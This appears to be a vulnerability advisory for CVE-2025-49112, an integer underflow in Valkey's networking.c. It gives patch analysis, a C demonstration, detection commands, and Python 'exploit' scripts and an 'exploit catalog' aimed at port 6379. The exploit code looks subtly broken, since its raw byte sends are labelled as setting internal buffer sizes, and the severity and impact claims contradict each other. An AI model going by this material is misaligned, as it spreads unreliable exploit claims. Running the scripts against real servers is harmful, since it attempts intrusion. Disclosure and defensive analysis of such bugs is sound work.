0DAYSECADVISORY

Integer Underflow setDeferredReply in networking.c Valkey

CVE ID: CVE-2025-49112
Vendor: Valkey
Affected: Valkey < v8.1.1
Severity:
Low
Patch Status:
Patched
Published: June 2, 2025
Discovered: May 2, 2025
Patched: May 26, 2025

Valkey Unsigned Integer Underflow Vulnerability Advisory

Integer Overflow/Underflow in Networking Code (CWE-191)

Vulnerability Overview

Identifier: CWE-191: Integer Underflow
Affected Component: src/networking.c (Buffer Size Calculation)
Impact: Potential Memory Corruption/DoS
Risk Rating: Medium (CVSS:5.9)

Technical Characteristics

CategoryDetails
Vulnerability ClassInteger Underflow
Attack VectorMalicious Network Packets
Privileges RequiredNetwork Access
Attack ComplexityHigh (Requires precise timing)
ScopeMemory Corruption Possible

Vulnerability Flow

Vulnerability Flow Diagram

Step-by-Step Technical Flow

  1. Vulnerable Code Path:

    // src/networking.c (Line 886)
if (prev->size - prev->used > 0) {  // Unsigned underflow risk
    /* Process remaining buffer */
}

  2. Exploitation Scenario:

    • Attacker sends packet causing prev->used > prev->size
    • Subtraction underflows creating huge value
    • Memory access out of bounds

Detailed Vulnerability

AspectPre-Patch StatePost-Patch State
Integer SafetyUnsafe subtractionExplicit bounds checking
Memory SafetyPotential corruptionGuaranteed bounds
Exploit ComplexityHighImpossible

Comparative Analysis

// Vulnerable Implementation
if (prev->size - prev->used > 0) {  // Unsafe

// Secure Implementation
if (prev->used < prev->size) {  // Safe bounds check

Security Impact Comparison:

  • Eliminates underflow potential
  • Clearer intent in code
  • Maintains identical functionality
  • Complies with CERT C standards

Proof of Concept

Exploit Development

#include <stdint.h>
#include <stdio.h>

// Simulate vulnerable condition
void process_buffer(uint32_t size, uint32_t used) {
    if (size - used > 0) {
        printf("Buffer has %u bytes remaining\n", size - used);
    } else {
        printf("Buffer full\n");
    }
}

int main() {
    // Normal case
    process_buffer(100, 50);  // Correct: 50 bytes remaining
    
    // Attack case
    process_buffer(50, 100);  // Underflow: 4294967246 bytes "remaining"
    return 0;
}

Reproduction Steps

  1. Setup Vulnerable Valkey:

    git clone https://github.com/valkey-io/valkey.git
cd valkey
git checkout daea05b1e26db29bfd1c033e27f9d519a2f8ccbb
make

  2. Craft Malicious Payload:

    import socket

def send_exploit():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('localhost', 6379))
    # Craft packet where used > size
    s.send(b"\x00\x00\x00\x64")  # size=100
    s.send(b"\x00\x00\x01\x2c")  # used=300
    s.close()

  3. Trigger Vulnerability:

    ./src/valkey-server &
python exploit.py

Technical Deep Dive

Underflow Mechanics

uint32_t size = 50;
uint32_t used = 100;
uint32_t remaining = size - used; 
// remaining = 4294967246 (0xFFFFFFCE)

Memory Corruption Path

  1. Underflow creates huge “remaining” value
  2. Subsequent memory operations use incorrect size
  3. Potential heap buffer overflow

Process Execution Context

Vulnerability Flow Diagram

Mitigation Strategies

  1. Immediate Fix:

    if (prev->used < prev->size) {  // Safe comparison
    size_t remaining = prev->size - prev->used;
    /* Process remaining buffer */
}

  2. Defense-in-Depth:

    • Compiler flags (-ftrapv for signed traps)
    • Static analysis (clang-tidy)
    • Runtime bounds checking

  3. Secure Coding Practices:

    #include <stdckdint.h>
if (!ckd_sub(&remaining, prev->size, prev->used)) {
    /* Safe to use remaining */
}

Impact Expansion

Extended Risk Analysis:

  • Remote code execution potential
  • Service crash/DoS
  • Information disclosure
  • Heap metadata corruption

Advanced Threat

Vulnerability Flow Diagram

Forensic Artifacts

Detection Signatures:

# Memory anomaly detection
grep "valkey.*segfault" /var/log/syslog

# Network pattern matching
tcpdump 'port 6379 and tcp[20:4] > tcp[24:4]' -w valkey_attack.pcap

Indicators of Compromise:

  • Unexpected process crashes
  • Large memory allocations
  • Invalid size values in logs

Appendix: Complete Exploit Catalog

  1. Basic Underflow Trigger:

    import socket
s = socket.socket()
s.connect(('target',6379))
s.send(b"\x00\x00\x00\x01\x00\x00\x00\xff")  # size=1, used=255

  2. Heap Grooming Exploit:

    // Advanced exploit manipulating heap layout
for (int i=0; i<100; i++) {
    send_packet(100, 100+i);  // Gradual underflow
}

Patch Details

Official Fix Analysis:

- if (prev->size - prev->used > 0) {
+ if (prev->used < prev->size) {

Security Improvements:

  1. Eliminates underflow possibility
  2. Clearer code intention
  3. Maintains original functionality
  4. Complies with secure coding standards

Advisory Credits

Security Researchers:

  • @odaysec (GitHub) - Discovery and analysis

Acknowledgements:

  • Valkey maintainers
  • Redis original authors

Responsible Disclosure Timeline Compliance

Vulnerability Flow Diagram

References

  1. CWE-191: Integer Underflow
  2. CERT INT02-C
  3. Valkey Security Policy
View on GitHub